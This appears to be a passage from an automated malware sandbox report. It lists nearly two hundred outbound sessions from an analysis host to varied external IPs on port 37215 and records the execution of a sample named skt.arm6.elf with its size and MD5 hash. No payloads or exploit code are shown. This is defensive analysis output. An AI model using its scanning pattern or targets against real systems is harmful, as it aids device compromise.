                                                          10346192.168.2.155428041.35.190.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10347192.168.2.155823241.93.86.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10348192.168.2.1537166138.64.78.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10349192.168.2.1539280122.201.128.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10350192.168.2.1552622197.49.38.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10351192.168.2.1535796157.184.171.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10352192.168.2.1544780157.183.26.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10353192.168.2.155912234.44.159.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10354192.168.2.154502671.91.240.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10355192.168.2.154521267.53.39.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10356192.168.2.1534788157.124.38.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10357192.168.2.1550228157.40.181.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10358192.168.2.1542014157.69.76.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10359192.168.2.1556738157.250.102.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10360192.168.2.1536332109.205.165.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10361192.168.2.1533692139.163.64.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10362192.168.2.1546200157.156.207.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10363192.168.2.1558930197.12.220.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10364192.168.2.1550756157.216.165.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10365192.168.2.1553908160.109.245.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10366192.168.2.1558278197.211.56.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10367192.168.2.1542436157.122.205.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10368192.168.2.1540002197.68.244.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10369192.168.2.155488841.203.45.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10370192.168.2.1556714157.72.225.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10371192.168.2.1536844123.93.108.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10372192.168.2.1557838143.247.172.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10373192.168.2.155357441.129.202.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10374192.168.2.155485241.227.151.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10375192.168.2.1550422197.234.191.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10376192.168.2.155243841.64.18.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10377192.168.2.154027241.249.236.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10378192.168.2.1556984197.125.205.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10379192.168.2.1538458197.251.23.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10380192.168.2.1548102211.167.176.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10381192.168.2.1548588157.86.35.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10382192.168.2.153909041.32.212.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10383192.168.2.1547672157.112.214.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10384192.168.2.154170288.22.113.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10385192.168.2.1549502157.248.197.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10386192.168.2.1560872157.62.51.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10387192.168.2.1553360193.177.8.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10388192.168.2.1538330220.10.218.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10389192.168.2.1539368113.117.183.2737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10390192.168.2.1537952197.39.121.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10391192.168.2.153803241.207.119.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10392192.168.2.1547370197.136.175.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10393192.168.2.155348641.26.31.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10394192.168.2.155444641.115.74.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10395192.168.2.1544272157.5.81.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10396192.168.2.1551262197.251.36.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10397192.168.2.155295441.96.197.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10398192.168.2.1551480157.222.66.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10399192.168.2.1538678197.153.101.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10400192.168.2.1543170157.158.1.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10401192.168.2.1551844157.167.172.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10402192.168.2.155730041.25.154.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10403192.168.2.154511241.245.123.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10404192.168.2.1560598223.192.183.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10405192.168.2.1557532157.16.154.16037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10406192.168.2.155318441.63.220.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10407192.168.2.154522241.179.186.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10408192.168.2.1555130197.224.5.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10409192.168.2.154779641.98.246.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10410192.168.2.1548902197.88.106.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10411192.168.2.1536778197.69.33.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10412192.168.2.153955041.70.37.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10413192.168.2.155889841.153.197.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10414192.168.2.1543206157.163.196.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10415192.168.2.154856614.38.234.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10416192.168.2.153416441.184.244.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10417192.168.2.1545196197.227.186.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10418192.168.2.1545900160.178.135.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10419192.168.2.153422841.108.88.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10420192.168.2.155443854.130.15.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10421192.168.2.154349885.250.93.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10422192.168.2.154254442.99.156.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10423192.168.2.1538218197.163.25.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10424192.168.2.154926241.34.88.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10425192.168.2.154354441.246.209.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10426192.168.2.154464441.10.208.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10427192.168.2.1541678212.67.98.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10428192.168.2.154996041.30.80.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10429192.168.2.1539118157.49.11.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10430192.168.2.155928841.71.2.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10431192.168.2.155024841.45.1.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10432192.168.2.1533144218.57.223.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10433192.168.2.154203841.237.128.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10434192.168.2.154033241.68.147.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10435192.168.2.1554314197.21.44.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10436192.168.2.1549702197.122.100.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10437192.168.2.1553456197.13.28.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10438192.168.2.1552562197.121.60.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10439192.168.2.1558474144.248.202.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10440192.168.2.154996484.114.29.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10441192.168.2.1543430157.251.191.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10442192.168.2.1548120175.42.172.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10443192.168.2.1543338197.197.135.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10444192.168.2.154902461.208.173.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10445192.168.2.155923041.221.50.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10446192.168.2.1539302197.180.142.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10447192.168.2.1560502157.157.212.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10448192.168.2.155365441.110.8.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10449192.168.2.154827041.205.44.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10450192.168.2.1545832197.174.5.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10451192.168.2.154952641.8.157.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10452192.168.2.154376641.75.47.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10453192.168.2.1551072197.81.198.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10454192.168.2.155713460.100.26.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10455192.168.2.154879278.99.24.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10456192.168.2.1560522197.190.213.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10457192.168.2.1552006204.84.123.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10458192.168.2.1544422197.211.61.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10459192.168.2.155102425.163.211.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10460192.168.2.1544774157.67.216.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10461192.168.2.154387641.236.78.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10462192.168.2.1543692157.19.206.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10463192.168.2.155128641.51.32.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10464192.168.2.154459241.34.131.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10465192.168.2.154087441.24.65.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10466192.168.2.155132441.210.220.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10467192.168.2.1557248160.227.82.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10468192.168.2.156084441.113.241.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10469192.168.2.154682841.90.37.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10470192.168.2.15582961.170.101.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10471192.168.2.153528019.217.35.23737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10472192.168.2.154733696.104.89.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10473192.168.2.1532852157.30.70.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10474192.168.2.153517241.3.32.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10475192.168.2.155916441.127.193.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10476192.168.2.1551486157.116.91.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10477192.168.2.1552548197.54.178.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10478192.168.2.1542994197.159.14.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10479192.168.2.154103241.18.36.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10480192.168.2.153875641.3.130.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10481192.168.2.1532982157.15.234.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10482192.168.2.1553762197.202.98.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10483192.168.2.153999814.18.123.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10484192.168.2.1543594197.242.252.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10485192.168.2.154692441.26.87.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10486192.168.2.153398498.51.61.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10487192.168.2.154788641.228.13.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10488192.168.2.1543560197.154.162.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10489192.168.2.1550480197.222.29.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10490192.168.2.1549648157.187.110.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10491192.168.2.1543812221.177.97.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10492192.168.2.1539078157.102.183.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10493192.168.2.1551302188.27.216.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10494192.168.2.155369041.188.19.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10495192.168.2.1538606197.26.6.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10496192.168.2.1548646157.217.4.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10497192.168.2.1540874197.220.154.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10498192.168.2.1558406197.215.73.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10499192.168.2.153632841.217.217.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10500192.168.2.156068441.89.109.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10501192.168.2.1553778157.152.192.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10502192.168.2.1553312157.52.254.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10503192.168.2.156054041.35.32.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10504192.168.2.1538796157.146.19.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10505192.168.2.1548994197.207.14.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10506192.168.2.153723641.117.220.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10507192.168.2.1544218197.161.15.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10508192.168.2.1545814157.134.218.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10509192.168.2.153897041.189.93.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10510192.168.2.1558520157.96.60.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10511192.168.2.1553516187.225.53.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10512192.168.2.1544174157.116.158.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10513192.168.2.153779641.204.217.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10514192.168.2.1536164157.195.54.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10515192.168.2.1541472197.71.64.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10516192.168.2.1541708164.57.14.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10517192.168.2.1540352157.21.168.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10518192.168.2.1540798157.166.95.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10519192.168.2.1543178197.96.43.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10520192.168.2.155390641.57.100.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10521192.168.2.1538056197.65.108.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10522192.168.2.155108495.225.20.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10523192.168.2.154729099.180.193.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10524192.168.2.154374841.109.46.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10525192.168.2.1555812139.64.240.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10526192.168.2.1535624197.226.55.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10527192.168.2.1538586157.171.90.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10528192.168.2.1560466197.131.150.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10529192.168.2.1541494197.149.27.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10530192.168.2.1559296157.162.94.20137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10531192.168.2.1536968197.249.103.11437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10532192.168.2.155537641.203.52.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          10533192.168.2.153448241.173.177.25037215
                                                          TimestampBytes transferredDirectionData


                                                          System Behavior

                                                          Start time (UTC):07:55:43
                                                          Start date (UTC):28/05/2024
                                                          Path:/tmp/skt.arm6.elf
                                                          Arguments:/tmp/skt.arm6.elf
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                          Start time (UTC):07:55:43
                                                          Start date (UTC):28/05/2024
                                                          Path:/tmp/skt.arm6.elf
                                                          Arguments:-
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                          Start time (UTC):07:55:43
                                                          Start date (UTC):28/05/2024
                                                          Path:/tmp/skt.arm6.elf
                                                          Arguments:-
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                          Start time (UTC):07:55:43
                                                          Start date (UTC):28/05/2024
                                                          Path:/tmp/skt.arm6.elf
                                                          Arguments:-
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                                                          Start time (UTC):07:55:43
                                                          Start date (UTC):28/05/2024
                                                          Path:/tmp/skt.arm6.elf
                                                          Arguments:-
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1